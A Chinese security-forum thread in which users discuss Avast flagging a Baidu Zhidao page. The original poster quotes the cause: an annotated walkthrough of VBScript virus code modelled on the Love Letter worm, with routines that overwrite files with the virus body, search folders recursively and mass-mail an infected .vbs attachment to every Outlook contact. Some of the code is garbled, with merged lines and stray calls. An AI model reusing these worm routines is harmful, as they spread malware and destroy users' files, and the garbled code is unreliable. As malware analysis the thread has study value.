AVAST报百度（已经找到原因）

virusdefender

链接http://zhidao.baidu.com/question/19394891.html，请检查
在线扫描4家报毒http://r.virscan.org/a578f2938948e8ff09b6cb3149b8df1f


原因找到了：有人在下面写了一些代码，有关病毒的，所以造成了avast报告挂马。谢谢大家。

1. ．vbs脚本病毒如何感染、搜索文件   
   
2.           VBS脚本病毒一般是直接通过自我复制来感染文件的，病毒中的绝大部分代码都可以直接附加在其他同类程序的中间，譬如新欢乐时光病毒可以将自己的代码附加在.htm文件的尾部，并在顶部加入一条调用病毒代码的语句，而爱虫病毒则是直接生成一个文件的副本，将病毒代码拷入其中，并以原文件名作为病毒文件名的前缀，vbs作为后缀。下面我们通过爱虫病毒的部分代码具体分析一下这类病毒的感染和搜索原理：   
   
3.   以下是文件感染的部分关键代码：   
   
4.   Set   fso=createobject("scripting.filesystemobject")     '创建一个文件系统对象   
   
5.   set   self=fso.opentextfile(wscript.scriptfullname,1)   '读打开当前文件（即病毒本身）   
   
6.   vbscopy=self.readall                     '   读取病毒全部代码到字符串变量vbscopy……      
   
7.   set   ap=fso.opentextfile(目标文件.path,2,true)   '   写打开目标文件，准备写入病毒代码   
   
8.   ap.write   vbscopy                                                               '   将病毒代码覆盖目标文件   
   
9.   ap.close   
   
10.   set   cop=fso.getfile(目标文件.path)       '得到目标文件路径   
    
11.   cop.copy(目标文件.path   &   ".vbs")                     '   创建另外一个病毒文件（以.vbs为后缀）   
    
12.   目标文件.delete(true)                                                         '删除目标文件   
    
13.           上面描述了病毒文件是如何感染正常文件的：首先将病毒自身代码赋给字符串变量vbscopy，然后将这个字符串覆盖写到目标文件，并创建一个以目标文件名为文件名前缀、vbs为后缀的文件副本，最后删除目标文件。   
    
14.   下面我们具体分析一下文件搜索代码：   
    
15.   '该函数主要用来寻找满足条件的文件，并生成对应文件的一个病毒副本   
    
16.   sub   scan(folder_)         'scan函数定义，   
    
17.   on   error   resume   next                                   '如果出现错误，直接跳过，防止弹出错误窗口   
    
18.   set   folder_=fso.getfolder(folder_)   
    
19.   set   files=folder_.files                               '   当前目录的所有文件集合   
    
20.   for   each   file   in   filesext=fso.GetExtensionName(file)                                   '获取文件后缀   
    
21.       ext=lcase(ext)                                     '后缀名转换成小写字母   
    
22.       if   ext="mp5"   then                 '如果后缀名是mp5，则进行感染。请自己建立相应后缀名的文件，最好是非正常后缀名   ，以免破坏正常程序。   
    
23.           Wscript.echo   (file)   
    
24.       end   if   
    
25.   next   
    
26.   set   subfolders=folder_.subfolders   
    
27.   for   each   subfolder   in   subfolders         '搜索其他目录；递归调用   
    
28.       scan(   )      
    
29.       scan(subfolder)   
    
30.   next   
    
31.   end   sub   
    
32.           上面的代码就是VBS脚本病毒进行文件搜索的代码分析。搜索部分scan(   )函数做得比较短小精悍，非常巧妙，采用了一个递归的算法遍历整个分区的目录和文件。   
    
33.    
    
34.   2．vbs脚本病毒通过网络传播的几种方式及代码分析   
    
35.           VBS脚本病毒之所以传播范围广，主要依赖于它的网络传播功能，一般来说，VBS脚本病毒采用如下几种方式进行传播：   
    
36.   1）通过Email附件传播   
    
37.           这是一种用的非常普遍的传播方式，病毒可以通过各种方法拿到合法的Email地址，最常见的就是直接取outlook地址簿中的邮件地址，也可以通过程序在用户文档（譬如htm文件）中搜索Email地址。   
    
38.   下面我们具体分析一下VBS脚本病毒是如何做到这一点的：   
    
39.   Function   mailBroadcast()   
    
40.   on   error   resume   next   
    
41.   wscript.echo   
    
42.   Set   outlookApp   =   CreateObject("Outlook.Application")   //创建一个OUTLOOK应用的对象   
    
43.   If   outlookApp=   "Outlook"   Then   
    
44.       Set   mapiObj=outlookApp.GetNameSpace("MAPI")       //获取MAPI的名字空间   
    
45.       Set   addrList=   mapiObj.AddressLists                                 //获取地址表的个数   
    
46.       For   Each   addr   In   addrList   
    
47.         If     addr.AddressEntries.Count   <>   0   Then   
    
48.             addrEntCount   =   addr.AddressEntries.Count   //获取每个地址表的Email记录数   
    
49.             For   addrEntIndex=   1   To   addrEntCount               //遍历地址表的Email地址   
    
50.                 Set   item   =   outlookApp.CreateItem(0)             //获取一个邮件对象实例   
    
51.                 Set   addrEnt   =   addr.AddressEntries(addrEntIndex)       //获取具体Email地址   
    
52.                 item.To   =   addrEnt.Address                                           //填入收信人地址                 item.Subject   =   "病毒传播实验"         //写入邮件标题   
    
53.                 item.Body   =   "这里是病毒邮件传播测试，收到此信请不要慌张！"     //写入文件内容   
    
54.                 Set   attachMents=item.Attachments       //定义邮件附件   
    
55.                 attachMents.Add   fileSysObj.GetSpecialFolder(0)   &   "\test.jpg.vbs"   
    
56.                 item.DeleteAfterSubmit   =   True             //信件提交后自动删除   
    
57.                 If   item.To   <>   ""   Then      
    
58.                   item.Send                                           //发送邮件   
    
59.                   shellObj.regwrite   "HKCU\software\Mailtest\mailed",   "1"   //病毒标记，以免重复感染   
    
60.                 End   If   
    
61.             Next   
    
62.         End   If   
    
63.       Next   
    
64.   End   if   
    
65.   End   Function   
    
66.    
    

复制代码

cherry845

我这里ESS报5个威胁，小A也狂报，打开一半IE就死了。

Dirk

安全性待定，应该不是误报

virusdefender

Dirk 发表于 2011-8-14 21:17
安全性待定，应该不是误报

百度难道被。。。？

Dirk

virusdefender 发表于 2011-8-14 21:20
百度难道被。。。？

网页被挂马  很正常吧？

virusdefender

Dirk 发表于 2011-8-14 21:21
网页被挂马  很正常吧？

可是这不是普通网站啊。。

Dirk

virusdefender 发表于 2011-8-14 21:23
可是这不是普通网站啊。。

因为它是百度？

吴伟宁

MSE没报

夜ㄝ殇

确实被挂马了，貌似不是误报

zhejiyidejiban

已经检测到危害